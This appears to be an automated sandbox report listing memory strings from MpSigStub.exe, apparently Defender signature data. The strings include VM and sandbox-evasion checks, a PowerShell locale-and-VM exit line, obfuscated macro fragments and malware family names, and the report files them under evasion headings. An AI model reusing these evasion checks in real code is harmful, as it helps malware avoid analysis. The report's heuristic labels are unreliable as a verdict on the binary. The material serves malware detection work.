Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp Binary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VMRS.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: virtual hd
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: WerFault.exe, 00000009.00000003.3000293502.000000000616F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp Binary or memory string: *VMWARE*": IsVirtualPCPresent
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: "IsInVMware":
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vmgs.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.ISO.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.VSV.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: %vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: % *.txt.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: Virtual HD
Source: MpSigStub.exe, 00000024.00000003.6333688289.00000197A3355000.00000004.00000001.sdmp Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp Binary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: VMWare
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp Binary or memory string: *.vhds.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-armel.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: array("winmgmts:","win32_logicaldisk","win32_operatingsystem","winmgmts:\\localhost\root\securitycenter","antivirusproduct")
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: ropen "post","http://127.0.0.1:5/"&c,falsexs
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !bazarloader.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !bazarloader.b!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !glupteba.oo!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/obfuse.rvk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/obfuse.rvk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: getobject(nuts("136122127126120126133132075"))
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: .getobject(nuts("136122127126120126133132075"))
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: almonds = right(jelly, len(jelly) - 3)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: &almonds = right(jelly, len(jelly) - 3)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: pears = chr(beets - 17)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: loop while len(milk) > 0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: get(nuts("104122127068067112097131128116118132132")).create
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: ;get(nuts("104122127068067112097131128116118132132")).create]
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: backdoor:win64/bazarldr.mdk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !injector.ss!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !qakbot.sm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/obfuse.rsz!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/obfuse.rsz!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/qakbot.akg!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/qakbot.akg!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/qakbot.qgl!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/qakbot.qgl!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandownloader:o97m/qakbot.qgm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $trojandownloader:o97m/qakbot.qgm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !raccoonstealer.pa!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !raccoonstealer.da!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: trojandropper:androidos/anubis.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: %$trojandropper:androidos/anubis.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: !bazzarloader.km!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: fuck def
